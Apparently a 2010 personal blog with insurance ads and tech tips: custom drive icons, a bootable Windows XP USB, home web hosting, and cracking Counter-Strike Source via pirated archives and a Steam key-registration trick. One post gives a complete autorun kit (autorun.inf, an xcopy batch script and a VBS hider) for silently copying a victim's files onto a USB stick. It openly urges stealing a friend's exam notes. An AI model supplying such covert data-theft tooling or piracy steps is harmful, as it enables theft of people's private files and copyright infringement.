Thursday, December 30, 2010

Call Me for LIC 9236542531

      

LIC AGENT BARABANKI (SATYAM SRIVASTAVA) MOB-09236542531, 09369361050

LIC AGENT BARABANKI (SATYAM SRIVASTAVA) MOB-09236542531, 09369361050

Apna aur apne parivar kajeevan surakshit banane k liye mujhse sampark kare..
LIC agent
SATYAM SRIVASTAVA (Barabanki)
Mobile - 09236542531


अपना और अपने परिवार का जीवन सुरक्षित बनाने के लिए मुझसे संपर्क करें
एल० आई० सी० एजेंट (बाराबंकी)
सत्यम श्रीवास्तव


मोबाइल  - 09236542531

Saturday, December 25, 2010

How to secretly copy (steal) files from a computer to a USB Flash drive

Let’s say you and your friend are preparing for an all important exam that is going to decide the course the rest of your life takes. Your friend has some important notes on his computer that he isn’t going to share with you. Your friend is a moron. You need the notes so badly that you are willing to steal from him. He deserves it anyway.


To get the notes you can either break into his house at night, an accomplice keeps you hanging by a rope from the roof while you deliberately copy the files to your flash drive taking care not to let your feet touch the floor. Or you can walk into his room one morning and say with a feigned smile, “Hey, buddy! I have some great new music. Want it?”. Then plug your USB Flash drive into his PC to automatically copy his notes to your pen drive, secretly and silently. Copy the songs you brought to his PC to complete the act.
Sneaky, isn't it? So let us prepare such a sinister USB Flash drive.

STEP 1

Open Notepad (I recommend Notepad++) and copy-paste the following lines.
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
Save this as autorun.inf
The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something.
The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.
The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.

STEP 2

Open Notepad again and copy-paste the following lines
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
@echo off
cls
Save this as file.bat
This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.
The first file path "%USERPROFILE%\pictures" – is the target.
The second file path "%drive%\all\My pics" – is the destination.

STEP 3

Open Notepad once again and copy-paste the following line.
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
Save this as invisible.vbs
This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.

STEP 4

Open Notepad one last time and copy-paste the following line.
wscript.exe \invisible.vbs file.bat
Save this as launch.bat
This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.

STEP 5

Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.
This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly.


All credits are goes to Mr. Satyam Srivastava
Contact number : 09236542531, 09369361050
E-mail ID : satyamsrig@yahoo.co.in
Your donation make on 
SBI (Barabanki) account : 11082799470, 
Bank of India (Barabanki) Account : 751810110000251

Monday, December 20, 2010

Change Default Drive Icon of USB Pen Drive

Tired of seeing the same old boring drive icon when you insert your USB pen drive in thecomputer? Here is a simple and easy trick that will bring life to the icon you see whenever you insert your drive.
The trick is very easy and you can put any pic of yours to the icon of your drive.
What you need
•    USB drive
•    Icon image file in .ico format (you can either download or create your own using thissoftware)
How to make
1.    Insert your USB Pen Drive and open it.
2.    Create a Notepad file in it and write in the following values as shown below
3.    Here Label is the name of the drive and Icon refers to the name of your icon file.
4.    Save it and then rename it to “autorun.inf”.
5.    Ensure that autorun and ico files are present in the drive all time (you may also hide them).
The drive will show the new icon when you insert it the next time. So tell me how you liked the trick.

Saturday, December 18, 2010

Install Windows XP Using Bootable Pendrive





Windows Xp Pen Drive
Why would anyone want to install Windows XP from a pen drive?
  1. Some Laptops like asus eeepc, acer aspire one, hp mini etc don’t have CD-drive
  2. May be their CD drive isn’t working properly like mine, or
  3. They don’t want to waste money on a CD
More over installation from a flash drive is faster compared to a CD.
Before we go on with the tutorial here’s what you’ll need
Requirements
——————
  1. USB flash drive, 1GB or larger
  2. 1 Windows XP installation disc
  3. Assorted files that I’ll describe as we go along.
Note: Your BIOS should support usb boot, some older computers may not support USB boot.
Preparing the flash drive
————————-
First up, we need to prepare the flash drive.
  1. Download and unzip this file, which should contain 2 folders: 1 titled Bootsect, and the other USB_prep8.
  2. Navigate to the USB_prep8 folder and click on usb_prep8.cmd. This will bring up a Windows console window.
  3. Press any key to continue and a PeToUSB window will open.
  4. Make sure your flash drive is selected, and click start to format your flash drive.
  5. When the format is complete, click OK, but do not close the PeToUSB window or the Windows Console.
  6. Open a new console window by typing “cmd” into the run box in the Windows Start Menu.
  7. Directed to the second folder – Bootsect folder (if you’re not used to DOS commands, you can type “dir” to list directories and files, type “cd foldername” to navigate to a folder name – called foldername in this example, and if there’s a long folder name you can save time by typing the “cd” and just the first few letters and then hitting the Tab key to fill in the rest of the name).
  8. Once you’re in the Bootsect folder, type “bootsect.exe /nt52 g:” if “g” is the letter assigned to your flash drive. If it’s E, then change the letter to e. If it’s Z, make it z. Get it?
  9. When this is done, you should see a message letting you know that the bootcode was updated, and you can close this console window (but not the other console window).
  10. Close the PeToUSb Window, but make sure not to close the remaining console window yet
  11. You should now see a list of 8 options in the console.
  12. Select one and find the drive with your Windows installation disc.
  13. Select 2 and pick a random drive letter (but not one that’s already on your PC, since this will be a virtual drive used for copying your files).
  14. Select 3 and enter the drive letter for your USB flash drive.
  15. Select 4 and follow the rest of the on-screen directions and you should be all set.
The process should take about 15-20 minutes. When it’s done, you should have a bootable USB stick that you can use to install Windows XP the same way you would if you had a CD/DVD drive.
A few notes here. First of all, there’s a chance you may get down to step 15 and the program will tell you that it can’t create the virtual drive. This may happen if you’ve already gone through the whole process and are trying to do it again to fix problems. The solution seems to be rebooting your computer and trying again. Or at least that’s what worked for me.
Second, if you use NLite to shrink/slipstream/otherwise modify your Windows XP installation file, make sure you do not remove “manual installation files,” or your USB stick will be pretty much useless.
Once your usb drive is ready, go to your bios and set USB to first position in boot order. Now plug the usb and restart.
Make sure you back up your important documents and files, firefox bookmarks, and drivers if you lost your drivers cd.
This post explains you how to backup your drivers easily

Thursday, December 16, 2010

  

LIC AGENT BARABANKI (SATYAM SRIVASTAVA) MOB-09236542531, 09369361050

Apna aur apne parivar kajeevan surakshit banane k liye mujhse sampark kare..
LIC agent
SATYAM SRIVASTAVA (Barabanki)
Mobile - 09236542531


अपना और अपने परिवार का जीवन सुरक्षित बनाने के लिए मुझसे संपर्क करें
एल० आई० सी० एजेंट (बाराबंकी)
सत्यम श्रीवास्तव


मोबाइल  - 09236542531

Tuesday, December 14, 2010

Host A Web Server on Your Home PC


If you want to make small site of your own and don’t want to pay for hosting prices, this article and exactly tell you how to do it.I had always wondered if I can host my blog or a small site on my laptop but looking at traffic and security I can’t.
But if you want to make a website for friends and family this can be a good solution for you . Its a free software so you dont have to pay any money for this. A friend was going through some magazine ( I am not sure which one ) and he told me about a software that really can help you hosting a web site on your own pc. I gave it a try and found that it’s really good.
Update : Also check out Opera Unite, advanced option to create a web server on home pc.
Below are the steps and small analysis of my experience with this software in just 6 steps. I tested it in Windows XP, but for Vista and Windows 7 you need to check.

Step 1: Download and Run The Software

Download the HFS or Http file server.It is free and open source and above all that it’s a standalone executable that requires no installation.
  • When you run HFS you might be asked whether or not allow hfs.exe to connect to Internet.Unblock it.
  • But if you have 3rd party firewall you will have to configure it accordingly.

Step 2: Configure the port

By default HFS uses port 80.if you your firewall is blocking port 80, set HFS to some other port( for example to 8025 or which ever is free, as a precaution keep it above 1024 which is used my operating system itself.)
hfs_port_no
  • To change the port number, click on Port Number menu and enter a new one.
  • Also, if you are behind a router or firewall, you may in some rare cases, need to set up port forwarding. For all the help required for visit portfrward
  • Port-forward can help you out to set up port forwarding.There you can choose the router type and choose a program you want to set up port forwarding for, which is in our case is HFS.

Step 3: Test HFS

Now you need to test your settings before you start.Click the menu in HFS and choose self test.If the test completes successfully, your settings are correct and you are ready for next step, To point your web browser to your ip address.
hfs_self_test

Step 4: Register A domain

For setting up a web site, you need to first assign it a domain name.Domain name are  another name for a computer ip address. For this, you will need to a DNS service running on your computer which can be mapped to particular ip address.
  • Create a Create a new user at No-IP account.
  • Login to the site with the account you created.On the left-sidebar click on “Hosts/Redirects”
  • Click on Add.In the page that opens enter domain name of your choice e.g “myfamilypics” and It will create a sub-domain on its own server that will work on your ip.
addhost to home server
  • Your IP is recorded when you add the domain name.If you ISP is blocking port 80, you can choose a redirect given under same page.
  • Click on “Create host” and you are ready to roll.
  • Access the same from your own browser.You can add your file In HFS and access the same.
Trust me I have done it and it works.But i cant give the link of my url ( as it is hosted on my computer) here keeping in mind the security issues which I am not aware of. SO you also should share it among your friends.

Step 5. Install The dynamic update Client

Skip this step if yo have a static ip but ff you don’t, you will need a client software to take care of your changing ip address.

Step 6: Launch Your Website

You can now decide what page will appear when someone accesses your site, like the default page. To change the default page,
  • Open HFS and click on “You are in Easy Mode ” to turn it to advance mode.
  • Right click on little house icon on VFS and click on “Bind Root to Real Folder”.
  • Now you can add files and folder here which you want to make available in your website.
  • Next is when your site is ready send the address which you created in NO-IP or step 4 to all your friends.
  • You can even see what others are viewing in advanced mode of hfs
add_hfs.png
This helped me a lot to understand how things work  for example when my blog is hosted and how do my hosting service works.This was a Small example on low scale basis for you to try and for people who want to run there host on their own system.Do tell me your experience when you try it.I will be glad.

How to Get Counter Strike Source Code.

Getting Counter-Strike Source to work

Step 1- Download cssource_notcracked_beta_emporio.rar, cssource_cracked_emporio.rar and cssource_updates_emporio.rar (make sure this update is V2).

Step 2- Extract cssource_notcracked_beta_emporio.rar to a folder (for this example we will use E:/CS: Source*), then extract cssource_cracked_emporio.rar to E:/CS: Source*(overwrite all files) and finally extract cssource_updates_emporio.rar(V2) to E:/CS: Source* (overwrite all files).

Step 3- Make a NEW steam account(We will use Bob1g2** for this example).

Step 4- Now here comes the tricky part. After you have made a NEW steam account, get any counter strike: condition zero key (and no i won't tell you one) off the internet. Launch steam and click on Condition Zero in the Avaible Games list. Click on Register this product and click next. Once you get to the point where it says, "Steam is processing you request" open up Task Manager (Ctrl, Alt, Delete at the same time) and click on steam.exe and once the steam window has 1 bar that is yellow, click terinate process on the task manager.

Step 5- Open up steam again and check if Condition Zero is in your My Games list. If it isn't then repeat Step 3 using a different key untill you get Condition Zero is your My Games list. Once you get it in your My Games list then, download Codename Gordon and once it has finished downloading, launch it. Once you get into the menu, then click exit.

Step 6- Go into the folder where you installed steam and copy ClientRegistry.blob into the folder where you installed CS: Source.

Step 7- Go into the folder where you installed CS: Source and open up SteamApp.cfg.

Step 8- Once you have opened up SteamApp.cfg, edit it so it only has this in it:

CODE

SteamAppId=10
#SteamAppVersionId=0
SteamInstallPath="E:/CS: Source*"
# [as is clearified later on, this should be your email address:]
#SteamAppUser=aalb002@cafe.boomtown.net
SteamAppUser=Bob1g2**


Make sure you change the Bob1g2** bit to the new steam account you created and the E:/CS: Source* to where you installed counter-strike source.

Step 9- Make a sortcut of hl2.exe with these in the sortcut(without the quotes) "-steam -game cstrike"

*Change this to where you installed CS: Source.
**Change this to your new steam account.

Downloads

cssource_notcracked_beta_emporio.rar- fxp://cs.rivera.ru/games/Counter-Strike/CS_Source/client/cssource_notcracked_beta_emporio.rar

cssource_cracked_emporio.rar- fxp://cs.rivera.ru/games/Counter-Strike/CS_Source/client/V2/cssource_cracked_emporio.rar

cssource_updates_emporio.rar(v2)- fxp://cs.rivera.ru/games/Counter-Strike/CS_Source/client/V2/cssource_updates_emporio.rar

Limit is 100 users max

Other things you should know

Don't download the V3 update since that doesn't work yet.

If you get a error saying that you are not subscribed, then do steps 4-6 to make it work again.

If you get unable to set mode then do this:
go to your registry -> HKEY_CURRENT_USER\Software\Valve\Source\Settings -> look up the entry "ScreenRefreshRate" -> doubleclick -> type your favourite monitor hz value into the field (i.e. 100hz, if your monitor can handle it) -> change the base setting from hexadecimal to decimal -> finished. (excerpt taken from flinkerhamster tutorial)

Some Servers

1. 66.199.235.42:27014

2. 24.141.2.86

These servers have being tested by me and are working.
SATYAM SRIVASTAVA (THE HACKER)
0091-9236542531, 0091-9369361050